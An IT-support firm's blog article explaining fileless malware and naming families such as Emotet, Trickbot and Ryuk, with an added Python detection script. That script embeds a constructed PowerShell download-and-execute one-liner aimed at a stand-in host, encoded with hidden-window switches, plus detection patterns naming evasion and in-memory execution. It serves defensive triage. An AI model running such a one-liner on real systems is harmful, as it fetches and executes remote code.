We are often warned not to download files we cannot trust, from sources we do not know, because they may contain malware. But are you aware of the threat posed by fileless malware?
Continue reading to learn more about fileless attacks, or, if you would prefer to let someone else worry about IT security in your business or organisation, call us on (07) 3062 6932 or get in touch online for help with small business IT support, business continuity solutions and security.
What is Fileless Malware?
Fileless malware is malicious software that, rather than existing as a file on a hard drive, typically exists only in computer memory such as RAM. Because it lives in volatile memory, which is cleared when the computer is rebooted, fileless malware leaves very little forensic evidence that could be used to identify and pinpoint the source of any unwanted activity. Fileless malware may be used to deploy other types of malicious software, such as ransomware.
How are Fileless Attacks Executed?
On Windows PCs, fileless attacks use legitimate software that typically comes bundled with, or is an integral part of, the operating system. By abusing tools such as Windows PowerShell, for example, a fileless attack can execute malicious commands on the target system while remaining undetected. Because PowerShell is a trusted part of the Windows ecosystem, the commands it executes are typically assumed to be safe. Other common approaches abuse features such as Windows Management Instrumentation (WMI), the .NET Framework and Microsoft Office macros, all of which have perfectly legitimate uses, all of which form part of Windows, and all of which the system often depends on to function as intended.
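The detection side of what is described above, as an added example that is not part of the original article: a small Python triage script run over constructed process-creation events. The field names (id, image, parent_image, command_line) are assumptions modelled loosely on Sysmon Event ID 1 or Windows 4688 records, and the sample payload and events are constructed for the example. Because the tool itself (PowerShell, WMI) is trusted, the script looks instead at what the tool is being asked to run: an Office application spawning a scripting host, an encoded command line (decoded as UTF-16LE base64, the encoding PowerShell uses), switches that hide the window or bypass execution policy, and in-memory execution constructs such as Invoke-Expression or DownloadString. It also handles an encoded argument that does not decode cleanly.

```python
import base64
import binascii
import re

# Living-off-the-land binaries the attack description above relies on.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe",
           "regsvr32.exe", "rundll32.exe"}
# Office hosts: a macro-driven infection shows up as Office spawning a LOLBIN.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Switches commonly used to hide a PowerShell window or skip policy checks.
EVASION_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:noprofile|nop|noninteractive|noni|"
    r"executionpolicy\s+bypass|ep\s+bypass|windowstyle\s+hidden|w\s+hidden)\b")
# Constructs that fetch or run code in memory without writing it to disk.
IN_MEMORY_PATTERNS = re.compile(
    r"(?i)\b(?:invoke-expression|iex|downloadstring|frombase64string|"
    r"reflection\.assembly|invoke-wmimethod|invoke-cimmethod)\b")
# The -EncodedCommand family of switches followed by its base64 argument.
ENCODED_ARG = re.compile(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")

# Constructed payload: the kind of one-liner a macro hands to PowerShell.
# It is only data for the detector; nothing in this script executes it.
CONSTRUCTED_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://example.invalid/payload')")
_ENCODED = base64.b64encode(CONSTRUCTED_PAYLOAD.encode("utf-16le")).decode("ascii")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events; the field names are assumptions, not a real schema.
SAMPLE_EVENTS = [
    {"id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"id": 2, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "wmic.exe os get Caption,Version"},
    {"id": 3, "image": PS,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"id": 4, "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     # QUJD is base64 for the three bytes "ABC": valid base64, invalid UTF-16LE.
     "command_line": "pwsh.exe -EncodedCommand QUJD"},
]


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, a sentinel if it is
    malformed, or None when the command line carries no encoded argument."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return "<undecodable encoded command>"


def analyse_event(event):
    """Return the list of reasons an event looks like fileless tool abuse."""
    reasons = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]

    if image in LOLBINS and parent in OFFICE_HOSTS:
        reasons.append(f"office-spawned-lolbin:{parent}->{image}")

    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-command")
    # Scan the command line with the base64 blob removed, plus its decoded
    # form, so the indicators are matched against what would actually run.
    text = ENCODED_ARG.sub(" ", cmd) + " " + (decoded or "")

    flags = sorted({" ".join(m.group(0).split()).lower()
                    for m in EVASION_FLAGS.finditer(text)})
    if flags:
        reasons.append("evasion-flags:" + ",".join(flags))
    hits = sorted({h.lower() for h in IN_MEMORY_PATTERNS.findall(text)})
    if hits:
        reasons.append("in-memory-execution:" + ",".join(hits))
    return reasons


def triage(events):
    """Map event id -> reasons for every event that raised at least one."""
    flagged = {}
    for event in events:
        reasons = analyse_event(event)
        if reasons:
            flagged[event["id"]] = reasons
    return flagged


if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: " + "; ".join(reasons))
```

Running the script flags event 3 (Word spawning a hidden, encoded PowerShell that downloads and runs code in memory) and event 4 (an encoded command that cannot be decoded, which is itself worth a look), while the backup script and the WMI inventory query pass. Command-line telemetry like this is most useful alongside PowerShell Script Block Logging (Event ID 4104), which records the script as it runs in memory even when it never touches disk.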
What are Some Examples of Fileless Malware?
Recent fileless attacks have used the following known malicious software to harm their targets:
- Operation Cobalt Kitty – reported in 2017, this attack targeted a specific global corporation based in Asia and successfully compromised more than forty personal computers and servers. The attackers remained in the affected network, undetected by traditional anti-malware countermeasures, for at least a year.
- Emotet – which as recently as November 2020 used parked domains for distribution.
- Trickbot – originally a trojan programmed to steal banking details from its victims, Trickbot was used to spread ransomware in late October 2020 in attacks targeting US hospitals and healthcare providers at the height of the Covid-19 pandemic in North America. In that attack, Trickbot was in fact used to deliver the next malware on our list, Ryuk.
- Ryuk – ransomware that encrypts the infected system, rendering data inaccessible until a ransom is paid. A new strain with worm-like features, allowing Ryuk to self-propagate and distribute itself further, was discovered early this year (2021).
- Spelevo – uses social engineering techniques to trick users into infecting themselves without the need to rely on software exploitation.
- Sodinokibi – startlingly, Sodinokibi is an example of organised cybercrime and a "ransomware as a service" operation, where the malware developers recruit affiliates to distribute the malicious code on their behalf, providing the malware tooling and sharing in the revenue generated through ransoms.
Ultimately, the list above contains only a few fileless malware examples and is by no means exhaustive. Unfortunately, malicious software continues to evolve every year, and the list of fileless malware threats is projected to only grow in the future. It is therefore, now more than ever, mission critical to be proactive about cyber security awareness and threat prevention and, should the worst happen, to have a business continuity plan, even for small business owners.
Put the information technology and security of your business to the test: claim your FREE IT health check from Connected Platforms today. Call us on (07) 3062 6932 or get in touch online now to get started.